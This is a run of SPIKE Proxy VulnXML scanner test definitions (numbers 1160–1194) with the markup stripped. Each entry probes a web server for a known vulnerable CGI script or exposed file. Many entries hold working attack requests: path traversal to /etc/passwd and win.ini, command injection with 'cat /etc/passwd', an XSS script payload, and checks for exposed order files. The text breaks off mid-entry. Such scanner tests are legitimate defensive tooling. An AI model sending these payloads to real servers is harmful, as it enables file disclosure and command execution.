spkproxy/VulnXML/DirectoryTests/directorytest-1160.xml0100664000076500007650000000713307566204543021740 0ustar davedave (rtm.log) "Rich Media's JustAddCommerce allows retrieval of a log file 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}rtm.log HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ HttpPost Retry 200 HttpPost Retry 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1161.xml0100664000076500007650000000725307566204543021744 0ustar davedave (rwcgi60) "Oracle report server reveals system information without authorization. See See Oracle note 133957.1 - Restricting Access to the Reports Server Environment and Output" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}rwcgi60 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1162.xml0100664000076500007650000000727307566204543021747 0ustar davedave (rwcgi60/showenv) "Oracle report server reveals system information without authorization. See See Oracle note 133957.1 - Restricting Access to the Reports Server Environment and Output" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}rwcgi60/showenv HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1163.xml0100664000076500007650000000704507566204543021745 0ustar davedave (rwwwshell.pl) "THC reverse www shell" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}rwwwshell.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1164.xml0100664000076500007650000000724107566204543021744 0ustar davedave (scoadminreg.cgi) "This script (part of UnixWare WebTop) may have a local root exploit. It is also an system admin script and should be protected via the web." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}scoadminreg.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1165.xml0100664000076500007650000000705007566204543021743 0ustar davedave (search.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}search.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1166.xml0100664000076500007650000000733107566204543021746 0ustar davedave (search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini) "This CGI contains a well known vul that allows attackers to read any system file." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ [windows] 200 [windows] 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1167.xml0100664000076500007650000000732107566204543021746 0ustar davedave (search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini) "This CGI contains a well known vul that allows attackers to read any system file." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ [fonts] 200 [fonts] 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1168.xml0100664000076500007650000000704607566204543021753 0ustar davedave (search.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}search.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1169.xml0100664000076500007650000000726607566204543021760 0ustar davedave (search.pl?form=../../../../../../../../../../etc/passwd%00) "The ROADS search.pl allows attackers to retrieve system files." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}search.pl?form=../../../../../../../../../../etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1170.xml0100664000076500007650000000777007566204543021750 0ustar davedave (search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>) "Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Upgrade to FDSE version 2.0.0.0055" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1171.xml0100664000076500007650000000736107566204543021745 0ustar davedave (search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc) "It is possible to read files on the remote server 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ resolv\.conf 200 resolv\.conf 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1172.xml0100664000076500007650000000722607566204543021746 0ustar davedave (sendform.cgi) "This CGI by Rod Clark (v1.4.4 and below) may allow arbitrary file reading via email or allow spam to be sent. CAN-2002-0710. BID-5286." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}sendform.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1173.xml0100664000076500007650000000707007566204543021744 0ustar davedave (sendpage.pl) "Passes unparsed form input to command line" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}sendpage.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1174.xml0100664000076500007650000000731107566204543021743 0ustar davedave (sendtemp.pl?templ=../../../../../../../../../../etc/passwd) "This CGI contains a well known vul that allows attackers to read any system file." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}sendtemp.pl?templ=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1175.xml0100664000076500007650000000707007566204543021746 0ustar davedave (session/adminlogin) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}session/adminlogin HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1176.xml0100664000076500007650000000726307566204543021753 0ustar davedave (sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd) "Default scripts can allow arbitrary access to the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1177.xml0100664000076500007650000000702307566204543021746 0ustar davedave (sh) "Shell found in CGI dir!" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}sh HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1178.xml0100664000076500007650000000717107566204543021753 0ustar davedave (shop.cgi?page=../../../../../../../etc/passwd) "Remote file read retrieval." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}shop.cgi?page=../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1179.xml0100664000076500007650000000725207566204543021754 0ustar davedave (shop/auth_data/auth_user_file.txt) "The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}shop/auth_data/auth_user_file.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1180.xml0100664000076500007650000000722407566204543021743 0ustar davedave (shop/orders/orders.txt) "The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}shop/orders/orders.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1181.xml0100664000076500007650000000736707566204543021754 0ustar davedave (shopper.cgi?newpage=../../../../../../../../../../etc/passwd) "Versions 1 and 2 of Byte's Interactive Web Shoper allow attackers to read files remotely. Uncomment the #$debug=1 variable." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}shopper.cgi?newpage=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1182.xml0100664000076500007650000000734207566204543021746 0ustar davedave (shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|) "ShopPlus Cart allows arbitrary command execution. CAN-2001-0992." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd| HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1183.xml0100664000076500007650000000704207566204543021744 0ustar davedave (show.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}show.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1184.xml0100664000076500007650000000725507566204543021753 0ustar davedave (simple/view_page?mv_arg=|cat%20/etc/passwd|) "This CGI allows attackers to execute commands on the host as the HTTP daemon owner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}simple/view_page?mv_arg=|cat%20/etc/passwd| HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1185.xml0100664000076500007650000000726007566204543021750 0ustar davedave (sojourn.cgi?cat=../../../../../../../../../../etc/password%00) "This CGI allows attackers to read arbitrary files." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}sojourn.cgi?cat=../../../../../../../../../../etc/password%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1186.xml0100664000076500007650000000724507566204543021754 0ustar davedave (spin_client.cgi?aaaaaaaa) "This CGI may be vulnerable to remote execution by sending 8000 x 'a' characters (check to see if you get a 500 error message)" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}spin_client.cgi?aaaaaaaa HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1187.xml0100664000076500007650000000720307566204543021747 0ustar davedave (ss) "Mediahouse Statistics Server may allow attacker to execute remote commands. Upgrade to latest version or remove from the CGI directory." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ss HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1188.xml0100664000076500007650000000717507566204543021760 0ustar davedave (sscd_suncourier.pl) "Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}sscd_suncourier.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1189.xml0100664000076500007650000000733507566204543021757 0ustar davedave (ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd) "The server install allows reading of any system file by sending encoded '../' directives." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-118.xml0100664000076500007650000000705407566204543021664 0ustar davedave (.htaccess) "Contains authorization information" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}.htaccess HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1190.xml0100664000076500007650000000703607566204543021745 0ustar davedave (stat/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}stat/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1191.xml0100664000076500007650000000712007566204543021740 0ustar davedave (stats-bin-p/reports/index.html) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}stats-bin-p/reports/index.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1192.xml0100664000076500007650000000704407566204543021746 0ustar davedave (stats.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}stats.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1193.xml0100664000076500007650000000704607566204543021751 0ustar davedave (stats.prf) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}stats.prf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1194.xml0100664000076500007650000000704007566204543021744 0ustar davedave (stats/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and 